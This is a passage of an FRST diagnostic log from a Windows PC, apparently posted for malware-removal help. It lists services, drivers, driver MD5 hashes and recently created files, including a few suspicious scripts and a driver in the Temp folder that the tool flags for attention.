R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2017-09-22] ()
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10803440 2017-08-29] (TeamViewer GmbH)
S3 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [872432 2016-06-23] (Tunngle.net GmbH)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2016-06-12] (Microsoft Corporation)
S4 XperiaCompanionService; C:\Program Files\Sony\Xperia Companion\Service\XperiaCompanionService.exe [2205568 2017-02-07] (Sony)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2016-04-01] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2010-08-03] ()
S3 BstkDrv; C:\Program Files (x86)\BlueStacks\BstkDrv.sys [270904 2017-06-21] (Bluestack System Inc. )
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-10-25] (Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-10-25] (Disc Soft Ltd)
R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [132272 2016-12-05] (ESET)
U5 edevmon; C:\Windows\System32\Drivers\edevmon.sys [106768 2016-12-05] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [180544 2016-12-05] (ESET)
R1 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [70960 2016-12-05] (ESET)
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [30424 2017-02-16] (Sony Mobile Communications)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-01-15] (REALiX(tm))
S3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [25920 2017-01-26] (ASUSTeK Computer Inc.)
S3 libusbK; C:\Windows\System32\DRIVERS\libusbK.sys [47200 2016-10-07] (hxxp://libusb-win32.sourceforge.net)
S3 MYFAULT; C:\Windows\system32\drivers\myfault.sys [25752 2017-01-17] (Sysinternals)
R3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [14024 2017-08-27] ()
R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [42856 2016-03-27] (Nefarius Software Solutions)
S3 semav6msr64; C:\Windows\system32\drivers\semav6msr64.sys [21984 2015-06-04] ()
R3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [39464 2016-04-26] (Tunngle.net GmbH)
R3 VCSVADHWSer; C:\Windows\System32\DRIVERS\vcsvad.sys [21504 2008-12-26] (Avnex)
U5 VWiFiFlt; C:\Windows\System32\Drivers\VWiFiFlt.sys [59904 2009-07-14] (Microsoft Corporation)
R1 ZAM; C:\Windows\System32\drivers\zam64.sys [203680 2016-12-30] (Zemana Ltd.)
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2016-12-30] (Zemana Ltd.)
R3 ALSysIO; \??\C:\Users\Sblck\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S3 BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [X]
S3 GLCKIO; \??\C:\PROGRA~2\COMMON~1\INSTAL~1\Driver\9\INTEL3~1\690b33e1-0462-4e84-9bea-c7552b45432a.sys [X]
S3 PORTMON; \??\C:\Users\Sblck\Desktop\SysinternalsSuite\PORTMSYS.SYS [X]
S3 VBAudioVACAMME; system32\DRIVERS\vbaudio_cablea64_win7.sys [X]
S3 VBAudioVACBMME; system32\DRIVERS\vbaudio_cableb64_win7.sys [X]
S3 VBAudioVMVAIOMME; system32\DRIVERS\vbaudio_vmvaio64_win7.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]

========================== Drivers MD5 =======================

C:\Windows\System32\DRIVERS\1394ohci.sys ==> MD5 is legit
C:\Windows\System32\drivers\ACPI.sys ==> MD5 is legit
C:\Windows\system32\drivers\acpipmi.sys ==> MD5 is legit
C:\Windows\system32\drivers\adp94xx.sys ==> MD5 is legit
C:\Windows\system32\drivers\adpahci.sys ==> MD5 is legit
C:\Windows\system32\drivers\adpu320.sys ==> MD5 is legit
C:\Windows\system32\drivers\afd.sys 0DC2A9882540DEA4A55B08785E09D8FC
C:\Windows\system32\drivers\agp440.sys ==> MD5 is legit
C:\Windows\system32\drivers\aliide.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdide.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdk8.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdppm.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdsata.sys D4121AE6D0C0E7E13AA221AA57EF2D49
C:\Windows\system32\drivers\amdsbs.sys ==> MD5 is legit
C:\Windows\System32\drivers\amdxata.sys 540DAF1CEA6094886D72126FD7C33048
C:\Windows\system32\drivers\appid.sys F5206C19AAD6BA60360888E9A20396C7
C:\Windows\system32\drivers\arc.sys ==> MD5 is legit
C:\Windows\system32\drivers\arcsas.sys ==> MD5 is legit
C:\Windows\SysWow64\drivers\AsIO.sys 798DE15F187C1F013095BBBEB6FB6197
C:\Windows\SysWow64\drivers\AsUpIO.sys 1392B92179B07B672720763D9B1028A5
C:\Windows\System32\DRIVERS\asyncmac.sys ==> MD5 is legit
C:\Windows\System32\drivers\atapi.sys ==> MD5 is legit
C:\Windows\system32\drivers\bxvbda.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\b57nd60a.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Beep.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\blbdrive.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\bowser.sys ABA3984C822E4D3F889699912D85D6C5
C:\Windows\system32\drivers\BrFiltLo.sys ==> MD5 is legit
C:\Windows\system32\drivers\BrFiltUp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\bridge.sys 5C2F352A4E961D72518261257AAE204B
C:\Windows\System32\DRIVERS\bridge.sys 5C2F352A4E961D72518261257AAE204B
C:\Windows\System32\Drivers\Brserid.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrSerWdm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrUsbMdm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrUsbSer.sys ==> MD5 is legit
C:\Program Files (x86)\BlueStacks\BstkDrv.sys 7DB8EE09821A6D81A19A6591C9B8AA3A
C:\Windows\system32\drivers\bthmodem.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cdfs.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\cdrom.sys ==> MD5 is legit
C:\Windows\system32\drivers\circlass.sys ==> MD5 is legit
C:\Windows\System32\CLFS.sys 3963FEC1892368DD500E6ED1F5C286CE
C:\Windows\System32\DRIVERS\CmBatt.sys ==> MD5 is legit
C:\Windows\system32\drivers\cmdide.sys ==> MD5 is legit
C:\Windows\System32\Drivers\cng.sys A98CED39AD91B445E2E442A9BD67E8B4
C:\Windows\System32\drivers\compbatt.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\CompositeBus.sys ==> MD5 is legit
C:\Windows\system32\drivers\crcdisk.sys ==> MD5 is legit
C:\Windows\System32\drivers\csc.sys ==> MD5 is legit
C:\Windows\System32\Drivers\dfsc.sys 9B38580063D281A99E68EF5813022A5F
C:\Windows\System32\drivers\discache.sys ==> MD5 is legit
C:\Windows\System32\drivers\disk.sys 616387BBD83372220B09DE95F4E67BBC
C:\Windows\system32\drivers\dmvsc.sys 5DB085A8A6600BE6401F2B24EECB5415
C:\Windows\System32\drivers\drmkaud.sys 26FE888505E5A945B0536AF9A2A27A6F
C:\Windows\System32\DRIVERS\dtlitescsibus.sys 679FF716052109392D870F6A6C4A3535
C:\Windows\System32\DRIVERS\dtliteusbbus.sys E23FDD696839A4790682CA66C48D3F2F
C:\Windows\System32\drivers\dxgkrnl.sys 5CEF80AE869336376F550ECAE91E424A
C:\Windows\System32\DRIVERS\e1c62x64.sys 1BEF2C2E229452EC49FFE5A27283341D
C:\Windows\System32\DRIVERS\E1G6032E.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\eamonm.sys CD67EAD53BC83CBFE16FC844960014BF
C:\Windows\system32\drivers\evbda.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ehdrv.sys ABF75BCBC247287EA757F95DA53A610C
C:\Windows\system32\drivers\elxstor.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\epfwwfpr.sys 34AD14AA8C1E20F41CE304A39D355EC0
C:\Windows\system32\drivers\errdev.sys ==> MD5 is legit
C:\Windows\System32\Drivers\exfat.sys 7E45F8B117419ABA3BB26579F6E70324
C:\Windows\System32\Drivers\fastfat.sys 6EDFA237D25433C03F42FBFDB16BDD24
C:\Windows\system32\drivers\fdc.sys ==> MD5 is legit
C:\Windows\System32\drivers\fileinfo.sys ==> MD5 is legit
C:\Windows\System32\drivers\filetrace.sys ==> MD5 is legit
C:\Windows\system32\drivers\flpydisk.sys ==> MD5 is legit
C:\Windows\System32\drivers\fltmgr.sys ==> MD5 is legit
C:\Windows\System32\drivers\FsDepends.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Fs_Rec.sys 6BD9295CC032DD3077C671FCCF579A7B
C:\Windows\System32\DRIVERS\fvevol.sys 8F6322049018354F45F05A2FD2D4E5E0
C:\Windows\system32\drivers\gagp30kx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ggflt.sys A1F556318931B9EA276F4E2DA2C1791C
C:\Windows\System32\DRIVERS\ggsomc.sys 7F56A3E09A6AD40B07E4EFAD34A40A18
C:\Windows\system32\drivers\hcw85cir.sys ==> MD5 is legit
C:\Windows\System32\drivers\HdAudio.sys 975761C778E33CD22498059B91E7373A
C:\Windows\System32\DRIVERS\HDAudBus.sys ==> MD5 is legit
C:\Windows\system32\drivers\HidBatt.sys ==> MD5 is legit
C:\Windows\system32\drivers\hidbth.sys ==> MD5 is legit
C:\Windows\system32\drivers\hidir.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\hidusb.sys ==> MD5 is legit
C:\Windows\system32\drivers\HpSAMD.sys ==> MD5 is legit
C:\Windows\System32\drivers\HTTP.sys CF5C9BD985120781200D35FD445D0BD5
C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS EF558A02D734A1403583E95CCEEC2487
C:\Windows\System32\drivers\hwpolicy.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\i8042prt.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\iaStor.sys 26CF4275034214ECEDD8EC17B0A18A99
C:\Windows\system32\drivers\iaStorV.sys AAAF44DB3BD0B9D1FB6969B23ECC8366
C:\Windows\system32\drivers\iirsp.sys ==> MD5 is legit
C:\Windows\System32\drivers\RTKVHD64.sys 00D0BAD638E321E12A0A1F0D0CFF96B6
C:\Windows\system32\drivers\intelide.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\intelppm.sys ==> MD5 is legit
C:\Windows\system32\drivers\IOMap64.sys 1F1A6C529CEF5E68E84C5700097487F7
C:\Windows\System32\DRIVERS\ipfltdrv.sys ==> MD5 is legit
C:\Windows\system32\drivers\IPMIDrv.sys ==> MD5 is legit
C:\Windows\System32\drivers\ipnat.sys ==> MD5 is legit
C:\Windows\System32\drivers\irenum.sys ==> MD5 is legit
C:\Windows\system32\drivers\isapnp.sys ==> MD5 is legit
C:\Windows\system32\drivers\msiscsi.sys 96BB922A0981BC7432C8CF52B5410FE6
C:\Windows\System32\DRIVERS\kbdclass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\kbdhid.sys ==> MD5 is legit
C:\Windows\System32\Drivers\ksecdd.sys B6839909DDC1DDA53A5470DA3DE638A4
C:\Windows\System32\Drivers\ksecpkg.sys EF5F0751E656C74E550E46B047FBEA57
C:\Windows\system32\drivers\ksthunk.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\libusbK.sys C4AB79ACB70AAF0AC8B68A9018AA9625
C:\Windows\System32\DRIVERS\lltdio.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_fc.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_sas.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_sas2.sys ==> MD5 is legit
C:\Windows\system32\drivers\lsi_scsi.sys ==> MD5 is legit
C:\Windows\system32\drivers\luafv.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\massfilter.sys BB6F30527EEA0D3F61095A8AFA31E2D6
C:\Windows\system32\drivers\megasas.sys ==> MD5 is legit
C:\Windows\system32\drivers\MegaSR.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\HECIx64.sys 6B01B7414A105B9E51652089A03027CF
C:\Windows\System32\drivers\modem.sys BFFB0C93D9FB43CA42EF11C9240BFF7F
C:\Windows\System32\DRIVERS\monitor.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mouclass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mouhid.sys ==> MD5 is legit
C:\Windows\System32\drivers\mountmgr.sys 072D8646E23ECF8A3F5F0157017B4DB6
C:\Windows\system32\drivers\mpio.sys ==> MD5 is legit
C:\Windows\System32\drivers\mpsdrv.sys ==> MD5 is legit
C:\Windows\system32\drivers\mrxdav.sys 98DB1790F0A584E0A2528B92B052417F
C:\Windows\System32\DRIVERS\mrxsmb.sys 0CAFC684CABD24D089A53467CAF5C7BB
C:\Windows\System32\DRIVERS\mrxsmb10.sys B9361F539BAAC1D362808157EAE0BA3B
C:\Windows\System32\DRIVERS\mrxsmb20.sys A77260AE4B9E7B6C11675FB907D27AE8
C:\Windows\System32\drivers\msahci.sys ==> MD5 is legit
C:\Windows\system32\drivers\msdsm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Msfs.sys ==> MD5 is legit
C:\Windows\System32\drivers\mshidkmdf.sys ==> MD5 is legit
C:\Windows\System32\drivers\msisadrv.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSKSSRV.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSPCLOCK.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSPQM.sys ==> MD5 is legit
C:\Windows\System32\Drivers\MsRPC.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\mssmbios.sys ==> MD5 is legit
C:\Windows\System32\drivers\MSTEE.sys ==> MD5 is legit
C:\Windows\system32\drivers\MTConfig.sys ==> MD5 is legit
C:\Windows\System32\Drivers\mup.sys ==> MD5 is legit
C:\Windows\system32\drivers\myfault.sys 2C1756A2D5659E7945BA5294E5136922
C:\Windows\System32\DRIVERS\nwifi.sys ==> MD5 is legit
C:\Windows\System32\drivers\ndis.sys F7309F42555F8AAB7144A51A1F2585B0
C:\Windows\System32\DRIVERS\ndiscap.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndistapi.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndisuio.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ndiswan.sys ==> MD5 is legit
C:\Windows\System32\Drivers\NDProxy.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\netbios.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\netbt.sys E47D571FEC2C76E867935109AB2A770C
C:\Windows\system32\drivers\nfrd960.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Npfs.sys ==> MD5 is legit
C:\Windows\System32\drivers\nsiproxy.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Ntfs.sys 7FD5A7FB8F55254E9AF5666C653AF3CA
C:\Windows\System32\Drivers\Null.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\nusb3hub.sys 158AD24745BD85BA9BE3C51C38F48C32
C:\Windows\System32\DRIVERS\nusb3xhc.sys D40A13B2C0891E218F9523B376955DB6
C:\Windows\System32\drivers\nvhda64v.sys 6DD0B2337F74336EB1F83C3866538F9B
C:\Windows\System32\DRIVERS\nvlddmkm.sys 45DEB031D7D2FF9EFA2FAE7BAC86D7CB
C:\Windows\system32\drivers\nvraid.sys 0A92CB65770442ED0DC44834632F66AD
C:\Windows\system32\drivers\nvstor.sys DAB0E87525C10052BF65F06152F37E4A
C:\Windows\system32\drivers\nv_agp.sys ==> MD5 is legit
C:\Windows\system32\drivers\ohci1394.sys ==> MD5 is legit
C:\Windows\system32\drivers\parport.sys ==> MD5 is legit
C:\Windows\System32\drivers\partmgr.sys E9766131EEADE40A27DC27D2D68FBA9C
C:\Windows\System32\drivers\pci.sys ==> MD5 is legit
C:\Windows\System32\drivers\pciide.sys ==> MD5 is legit
C:\Windows\system32\drivers\pcmcia.sys ==> MD5 is legit
C:\Windows\System32\drivers\pcw.sys ==> MD5 is legit
C:\Windows\System32\drivers\peauth.sys EA4D67448BE493D543F1730D6CD04694
C:\Windows\System32\DRIVERS\raspptp.sys ==> MD5 is legit
C:\Windows\system32\drivers\processr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\pacer.sys ==> MD5 is legit
C:\Windows\system32\drivers\ql2300.sys ==> MD5 is legit
C:\Windows\system32\drivers\ql40xx.sys ==> MD5 is legit
C:\Windows\system32\drivers\qwavedrv.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rasacd.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\AgileVpn.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rasl2tp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\raspppoe.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rassstp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rdbss.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rdpbus.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\RDPCDD.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpdr.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpencdd.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdprefmp.sys ==> MD5 is legit
C:\Windows\System32\drivers\rdpvideominiport.sys 313F68E1A3E6345A4F47A36B07062F34
C:\Windows\System32\Drivers\RDPWD.sys FE571E088C2D83619D2D48D4E961BF41
C:\Windows\System32\drivers\rdyboost.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\rspndr.sys ==> MD5 is legit
C:\Program Files (x86)\MSI Afterburner\RTCore64.sys 2D8E4F38B36C334D0A32A7324832501D
C:\Windows\system32\drivers\vms3cap.sys ==> MD5 is legit
C:\Windows\system32\drivers\sbp2port.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\scfilter.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\ScpVBus.sys 2C1B33E53156E29E51BB99549AA98BBA
C:\Windows\System32\drivers\ScreamingBAudio64.sys 8B56BDCE6A303DDE63D63440D1CF9AD1
C:\Windows\System32\Drivers\secdrv.sys ==> MD5 is legit
C:\Windows\system32\drivers\semav6msr64.sys 07F83829E7429E60298440CD1E601A6A
C:\Windows\System32\DRIVERS\serenum.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\serial.sys ==> MD5 is legit
C:\Windows\system32\drivers\sermouse.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffdisk.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_mmc.sys ==> MD5 is legit
C:\Windows\system32\drivers\sffp_sd.sys ==> MD5 is legit
C:\Windows\system32\drivers\sfloppy.sys ==> MD5 is legit
C:\Windows\system32\drivers\SiSRaid2.sys ==> MD5 is legit
C:\Windows\system32\drivers\sisraid4.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\smb.sys ==> MD5 is legit
C:\Windows\SysWOW64\speedfan.sys 0FFE35F0B0CD5A324BBE22F02569AE3B
C:\Windows\System32\Drivers\spldr.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\srv.sys 546C81F238F084A393EC54114741A0A8
C:\Windows\System32\DRIVERS\srv2.sys 431D2B06E8F93EAEC53E8FA37FCFF2F1
C:\Windows\System32\DRIVERS\srvnet.sys 42EDAB3E3E8E25C7093674936C2DB4BD
C:\Windows\system32\drivers\stexstor.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\serscan.sys DECACB6921DED1A38642642685D77DAC
C:\Windows\System32\drivers\vmstorfl.sys ==> MD5 is legit
C:\Windows\system32\drivers\storvsc.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\swenum.sys ==> MD5 is legit
C:\Windows\system32\drivers\Synth3dVsc.sys C3A39C4079305480972D29C44B868C78
C:\Windows\System32\DRIVERS\tap0901.sys D765F43CBEA72D14C04AF3D2B9C8E54B
C:\Windows\System32\DRIVERS\tap0901t.sys C2535200B274DEC508881F587B7B5F16
C:\Windows\System32\drivers\tcpip.sys 7FB36A0A036ADDACE0A868E4A43C1C27
C:\Windows\System32\DRIVERS\tcpip.sys 7FB36A0A036ADDACE0A868E4A43C1C27
C:\Windows\System32\drivers\tcpipreg.sys 7FE5586314EE7D6AA8483264A089E5AF
C:\Windows\System32\drivers\tdpipe.sys ==> MD5 is legit
C:\Windows\System32\drivers\tdtcp.sys 51C5ECEB1CDEE2468A1748BE550CFBC8
C:\Windows\System32\DRIVERS\tdx.sys 4DD986720F7CB7A8A5D1226793097B9A
C:\Windows\System32\DRIVERS\termdd.sys ==> MD5 is legit
C:\Windows\system32\drivers\terminpt.sys EF4469AB69EB15E5D3754E6AEAFBCD3D
C:\Windows\System32\DRIVERS\tssecsrv.sys 19BEDA57F3E0A06B8D5EB6D619BD5624
C:\Windows\System32\drivers\tsusbflt.sys E9981ECE8D894CEF7038FD1D040EB426
C:\Windows\system32\drivers\TsUsbGD.sys D34789988234DCC8FA55FA9A485AF0EC
C:\Windows\system32\drivers\tsusbhub.sys E1748D04AE40118B62BC18AC86032192
C:\Windows\System32\DRIVERS\tunnel.sys ==> MD5 is legit
C:\Windows\system32\drivers\uagp35.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\udfs.sys ==> MD5 is legit
C:\Windows\system32\drivers\uliagpkx.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\umbus.sys ==> MD5 is legit
C:\Windows\system32\drivers\umpass.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\usbccgp.sys 28B81917A195B67617AF7DCF4DFE5736
C:\Windows\system32\drivers\usbcir.sys 80B0F7D5CCF86CEB5D402EAAF61FEC31
C:\Windows\system32\drivers\usbehci.sys B626F048318DAE65A3317F0592BE592C
C:\Windows\system32\drivers\usbhub.sys 390109E8E05BA00375DCB1ED64DC60AF
C:\Windows\system32\drivers\usbohci.sys B4DF0F4C1D9D25DFE1DAD1D8670F1D4F
C:\Windows\system32\drivers\usbprint.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\USBSTOR.SYS D029DD09E22EB24318A8FC3D8138BA43
C:\Windows\system32\drivers\usbuhci.sys CFEAAF96E666E3DCBD8F6DFF516784AE
C:\Windows\System32\DRIVERS\usb8023x.sys 7B28E2FBE75115660FAB31079C0A9F29
C:\Windows\System32\DRIVERS\vcsvad.sys 3A4B01C2BDB07DFEF29B0B369487503A
C:\Windows\System32\drivers\vdrvroot.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vgapnp.sys ==> MD5 is legit
C:\Windows\System32\drivers\vga.sys ==> MD5 is legit
C:\Windows\system32\drivers\vhdmp.sys ==> MD5 is legit
C:\Windows\system32\drivers\viaide.sys ==> MD5 is legit
C:\Windows\system32\drivers\vmbus.sys ==> MD5 is legit
C:\Windows\system32\drivers\VMBusHID.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\vodafone_K3805-z_dc_enum.sys 3BB37A860A72ED211E66E539943A7B3E
C:\Windows\System32\drivers\volmgr.sys ==> MD5 is legit
C:\Windows\System32\drivers\volmgrx.sys 85C5468BC395819AE2A0C747334BA14C
C:\Windows\System32\drivers\volsnap.sys DF8126BD41180351A093A3AD2FC8903B
C:\Windows\system32\drivers\vsmraid.sys ==> MD5 is legit
C:\Windows\System32\drivers\vwifibus.sys ==> MD5 is legit
C:\Windows\system32\drivers\wacompen.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\wanarp.sys ==> MD5 is legit
C:\Windows\system32\drivers\wd.sys ==> MD5 is legit
C:\Windows\System32\drivers\Wdf01000.sys E2C933EDBC389386EBE6D2BA953F43D8
C:\Windows\System32\DRIVERS\wfplwf.sys ==> MD5 is legit
C:\Windows\System32\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\SysWOW64\drivers\wimmount.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\WinUSB.sys FE88B288356E7B47B74B13372ADD906D
C:\Windows\System32\DRIVERS\wmiacpi.sys ==> MD5 is legit
C:\Windows\system32\drivers\ws2ifsl.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\WSDPrint.sys 8D918B1DB190A4D9B1753A66FA8C96E8
C:\Windows\System32\DRIVERS\WSDScan.sys 4A2A5C50DD1A63577D3ACA94269FBC7F
C:\Windows\System32\drivers\WudfPf.sys AB886378EEB55C6C75B4F2D14B6C869F
C:\Windows\System32\DRIVERS\WUDFRd.sys DDA4CAF29D8C0A297F886BFE561E6659
C:\Windows\System32\DRIVERS\xusb21.sys 2C6BC21B2D5B58D8B1D638C1704CB494
C:\Windows\System32\drivers\zam64.sys 21E13F2CB269DEFEAE5E1D09887D47BB
C:\Windows\System32\drivers\zamguard64.sys 21E13F2CB269DEFEAE5E1D09887D47BB
C:\Windows\System32\DRIVERS\ZTEusbmdm6k.sys 8A9E7E6169F92E64D5B5305562E363BB
C:\Windows\System32\DRIVERS\ZTEusbnet.sys 788E574905A3E3A08FC218CADEDCA71F
C:\Windows\System32\DRIVERS\ZTEusbnmea.sys 8A9E7E6169F92E64D5B5305562E363BB
C:\Windows\System32\DRIVERS\ZTEusbser6k.sys 8A9E7E6169F92E64D5B5305562E363BB
C:\Windows\System32\DRIVERS\ZTEusbvoice.sys 8A9E7E6169F92E64D5B5305562E363BB

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Three Months Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-12-28 16:02 - 2017-12-28 16:02 - 000000000 ____D C:\FRST
2017-12-28 05:58 - 2017-12-28 05:58 - 000218586 _____ C:\TDSSKiller.3.1.0.15_28.12.2017_05.58.03_log.txt
2017-12-28 04:09 - 2017-12-28 04:09 - 000000000 ____D C:\Windows\SysWOW64\data
2017-12-28 04:09 - 2017-12-28 04:09 - 000000000 ____D C:\Program Files (x86)\Sophos
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsigne5ae3db1246d235a
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign343e9ec52f7fd552
2017-12-28 03:53 - 2017-12-28 03:53 - 000000000 ____D C:\Users\Sblck\AppData\Local\Tempzxpsign1efa06de796e8ad3
2017-12-28 02:42 - 2017-12-28 02:42 - 000012872 _____ (SurfRight B.V.) C:\Windows\system32\bootdelete.exe
2017-12-28 02:42 - 2017-12-28 02:42 - 000000174 _____ C:\Windows\system32\bootdelete.lst
2017-12-28 02:33 - 2017-12-28 02:33 - 000000000 ____D C:\ProgramData\Emsisoft
2017-12-28 02:22 - 2017-12-28 02:22 - 000002621 _____ C:\Users\Sblck\AppData\Local\AppVShNotifyt.txt
2017-12-28 02:08 - 2017-12-28 02:22 - 000001757 _____ C:\Users\Sblck\AppData\Local\x
2017-12-28 02:08 - 2017-12-28 02:08 - 000938008 _____ C:\Users\Sblck\AppData\Local\WindowsCodecsRaw.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000002621 _____ C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.vbs
2017-12-28 02:08 - 2017-12-28 02:08 - 000002584 _____ C:\Users\Sblck\AppData\Local\AppVShNotifytvbs.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000001760 _____ C:\Users\Sblck\AppData\Local\xx
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ C:\Users\Sblck\AppData\Local\XXML.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000001684 _____ C:\Users\Sblck\AppData\Local\XML.txt
2017-12-28 02:08 - 2017-12-28 02:08 - 000000029 _____ C:\Users\Sblck\AppData\Local\MCconfig.dll
2017-12-27 20:44 - 2017-12-27 20:44 - 000000000 ____D C:\Users\Sblck\Documents\Paradox Interactive
2017-12-27 00:23 - 2017-12-27 00:23 - 000000000 ____D C:\Users\Sblck\Documents\Star Wars - The Old Republic
2017-12-26 20:11 - 2017-12-26 20:11 - 000000000 ____D C:\Users\Sblck\Documents\HeroBlade Logs
2017-12-26 20:11 - 2017-12-26 20:11 - 000000000 ____D C:\Users\Sblck\AppData\Local\SWTOR
2017-12-26 18:46 - 2017-12-26 18:46 - 000000000 ____D C:\Users\Sblck\AppData\LocalLow\Unity
2017-12-26 18:46 - 2017-12-26 18:46 - 000000000 ____D C:\Users\Sblck\AppData\LocalLow\Hyper Hippo Productions Ltd_
2017-12-26 17:58 - 2017-12-26 17:58 - 000000000 ____D C:\Users\Public\Documents\BitRaider
2017-12-26 17:58 - 2017-12-26 17:58 - 000000000 ____D C:\ProgramData\Documents\BitRaider
